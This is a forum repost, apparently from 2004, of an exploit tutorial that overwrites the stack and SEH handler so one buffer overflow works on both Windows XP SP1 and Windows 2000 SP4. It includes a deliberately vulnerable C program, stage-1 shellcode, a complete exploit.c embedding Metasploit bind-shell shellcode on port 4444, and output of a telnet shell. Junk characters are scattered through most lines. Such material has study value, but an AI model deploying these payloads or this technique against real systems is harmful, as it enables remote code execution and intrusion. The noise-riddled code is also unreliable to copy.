The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well. / H- P* G, a$ K P y ( }3 L; ~0 e$ _, s7 v4 P[Buf] <- Shellcode, o: X. A0 P4 @
[Return Address] <- jmp register (for Windows XP sp1) . h+ t; B" l2 v9 l- s[Various Stack Data] <- Junk/ I- s% J- @& v/ K) y
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward % D: W+ O+ a' l9 c T# s[SE Handler] <- jmp register (for Win2k sp4) 2 p" x- T i- A l6 k5 ^+ v( G[Stage1 Shellcode] <- stage1 shellcode for win2k9 o/ e/ i: L1 y; j
* y! y O/ `0 A2 i- D
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses _1 G* P2 E# I6 i" D' `- c
+ p7 `7 {8 i( f5 ~$ o, V; NVulnerable Code:4 E6 M5 e4 D- A* Q- D0 l8 X
//lamebuf.c 2 S6 o% B# r1 y#include<stdio.h>! b* B; s! F5 W/ A: k
#include<string.h>' @/ A- x' V! J' [
#include<windows.h>* I6 ]& I9 u8 P5 z+ G& k+ L z* q
int main(int argc,char *argv[]){ $ K2 |/ M% n3 C3 S' O6 d ) A- l0 A' ~3 W7 gchar buf[512];4 K8 w3 X, H* U) j$ i, P
char buf1[1024]; // <- simulate a stack; Y; j2 T w2 I/ K! e5 v" A% v
//DebugBreak(); ; `1 U, R. {6 c! F) Zif (argc != 2){ return -1; }( y; _/ t. m) R, t r k6 @
& H# j$ |. Z t/ L
strcpy(buf,argv[1]);5 s) [- j( V5 X2 y
return 0x0; 4 ~' F" U q! J' S- s}. q) _. P! ^9 u6 p
5 Z% x. ]5 l; S5 g1 b) E1 j$ jGetting Started:8 ^, h4 W! u9 a- p5 r1 J
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers: ! |5 k9 w# w/ t$ n, a' `( \, O% G) r9 u2 V' O) v
EAX 00000000 - W0 |% t3 U) A2 i) s b) pECX 00321404 " R5 J2 w' K/ l! cEDX 00414141 % y# P$ d+ l! S4 H2 H( NEBX 7FFDF000 4 x) @: M3 P/ y* w9 U1 e* PESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . V) l1 A6 m/ t( dEBP 41414141 ! ?* ]& q% h7 b- jESI 77D4595F$ I. I" Z+ I {% v8 M. i/ D$ R
EDI 77F59037 ntdll.77F59037$ R7 r& v' V+ ]( H/ N0 Z% R4 x
EIP 41414141- f# Q: Z1 d; V& S
% g9 S7 W0 b% U- K
Lets take a look at the stack and see what happened to the default exception handler: ( e/ s8 o ^: N- Q0x0012FFB0 41414141 Pointer to next SEH Record- L {* p& j9 z6 m t2 ~
0x0012FFB4 41414141 SE Handler 8 s5 `2 f# P! Q* f, J1 I; ^2 ]9 r( ?/ S9 @2 Y5 d: y
We successfully overwrote the return address and the default exception handler. , G0 ~, Q. v! p; L3 p1 R; m ! {: W# h/ C+ G C" |Primary Return Address (Windows XP SP1 EN): ! H8 N" j# r2 ~4 jThe first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:3 @7 h' D% x$ o$ ?
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"- N6 j% q1 W8 @" O7 d" S
$ u8 u1 p9 S/ b& ?: m/ r
Secondary Return Address (Windows 2000 SP4 EN):! @* ?( F* Q' z6 q
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be: ' C( d2 t) X& P6 f0 R9 c"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"* ]' \4 {3 Y) j9 ^ t
% t+ n8 i/ a* m0 s$ C( V; s4 t, ]Proof Of Concept:8 e) p5 N1 u# M" i
// exploit.c. d0 L, m& Y$ l" L6 b$ q
// Tal zeltzer - [Double Return] //8 }' t! n. H( ]3 z3 W4 N
( b! |% f" H# D Z/ D: Z8 P+ R
#include<stdio.h>* S; P& ^ J/ y, K& O
#include<string.h>) X/ M* f1 H& A
#include<windows.h>1 F8 [' W9 s6 ?6 I' v1 J f
; Z8 D/ {$ ]( Q+ i% k( l#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp ! |; a* i7 _- K# z- s- ]& e#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx4 M, @, v$ e8 U' c
3 |0 i, e" s6 |" J$ O! ?! }
// Stage1 For WinXP Sp1 English + U; u4 W, Z* [0 h) E5 Punsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"; 3 d4 _4 i* i- J! Z5 Q7 w - z0 H% ~' a! f6 K, b// Stage1 For Win2k Sp4 English 2 L. b) T5 @: _6 iunsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";3 I9 r {' ^4 C
: l, v* i( ~' j3 e
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com 0 L5 {! C3 y0 G# U$ f6 Z+ a: Ounsigned char shellcode[] = + |: E- A* X2 M5 A4 S"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"( R5 z3 J9 s, ]4 y) @0 A
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"3 g c2 U8 h, e
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"0 z3 q; x% j* I4 ]" L3 [1 ]) e
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"3 l( R1 F2 O5 Y; Q
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" - w9 `& w: p1 P"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"% O6 D. V; B1 f; F( x
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"9 z1 u" o6 n' Z5 f3 J1 O
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53" 5 j4 l2 K" H7 D, {; j, Z5 N"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"! d2 g5 E8 P3 x9 i* G: B0 X( Y
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"7 `% s0 Z5 U- u7 Y/ c, |' R
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"! R* S! ^+ g" V9 `2 |
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"5 t" ~, m0 j& R Q4 Z3 \1 @
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"" w0 \+ x8 X9 p6 v. z- n% b! T
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" & h; B4 W3 N2 c# @"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"! R* B* Q+ J8 K0 F' [' {
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c" * V* I; Z w$ C; g9 h"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" - X$ k( n* u: s' X"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f": x+ r+ X/ V' w8 @
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8", k0 `( P6 b) ]% r$ B
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" q: C5 Z+ i9 x6 ]' s( L) O% ?5 k
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f" + C1 N$ r5 D4 h"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" . D2 y; x9 \% O"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"7 U" b" B8 w( s5 n
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" : z; H$ G# Z7 E: \+ l5 Q"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 5 F- c: v- @6 B( b( S" A . q; p. ~* O0 | : Q% r8 U- S2 T, R1 g% x2 ^int main(int argc,char *argv[]){ " U* }, W# _- I' {6 D* D1 I3 r& ~, M1 F% Y, D
char *bufExe[3];, b# O, q3 l7 L3 K# Z3 A8 @
char buf[2048];9 c) i( i0 S9 r% a
bufExe[0] = "lamebuf.exe";9 A; m0 v" r3 z0 P j
bufExe[2] = NULL; ) |1 Q: Z0 Y1 R) ` & U. j- [& I+ f7 c umemset(buf,0x0,sizeof(buf)); : V7 X0 F6 L' gmemset(buf,0x90,1652);/ T3 t: k$ u# E: b: ?0 O9 _
memcpy(&buf[24],shellcode,sizeof(shellcode)-1); 6 X. D! m' p/ v7 @) A& c; q, T% l& T4 a* J% U+ }7 c
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode7 \5 b$ [1 Z$ r: r4 c
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode ) O# J# l7 x' H/ y5 n w" _, H & g* N- s& `& ~- w*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en6 I8 p$ I/ V4 f
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code / Q. V* w' ^( E*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en / L, M9 b3 ?( F' z9 Z, R 9 P: t7 u) U8 p . g3 f2 n3 F; a+ f: {bufExe[1] = buf;1 m% t# W' K B
//Execute the vulnerable application& r; m% h# T3 M0 X. u' [
execve(bufExe[0],bufExe,NULL);7 j& g2 u- b3 m* l; g4 H, {7 ~
# d1 _9 V7 t5 Z3 n# q
return 0x0; ) a1 T( l& n( B0 X) H( a}! F1 m% l- N5 s1 \
; M0 @7 G7 m5 }, a
Exploit under Windows XP SP1:4 A& G4 V) b# R- `4 e( t, P: U
C:\>exploit, L3 R9 f; S+ b, A% g& E
C:\>2 `6 G% k, K+ ]4 f+ O: f1 n
C:\>telnet 127.0.0.1 4444 9 u+ M. g9 m3 O) m4 q$ f7 |' F( Z) G8 C) k2 @% W" ^
Microsoft Windows XP [Version 5.1.2600]8 i# a6 _" i- Z; D$ u9 r* n/ b) Y$ c2 I
(C) Copyright 1985-2001 Microsoft Corp.2 O- t7 N) f9 b% \
$ V- z6 q( W# n( t
C:\> E+ I# J% `% h3 F8 R 6 r/ e* ^# P' H6 N4 ZExploit under Windows 2000 SP4: 3 D& V- m1 ?" y* r3 M8 G! [3 N1 QC:\>exploit 5 ]3 g7 b8 ?# f0 aC:\>) D7 ?, D, b$ t9 I
C:\>telnet 127.0.0.1 4444 p+ l/ ]4 g/ D; o/ S N0 v
+ t) B. M7 ?% J' |8 a
Microsoft Windows 2000 [Version 5.00.2195]9 S5 D! T' O* p, o; I
(C) Copyright 1985-2000 Microsoft Corp.
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
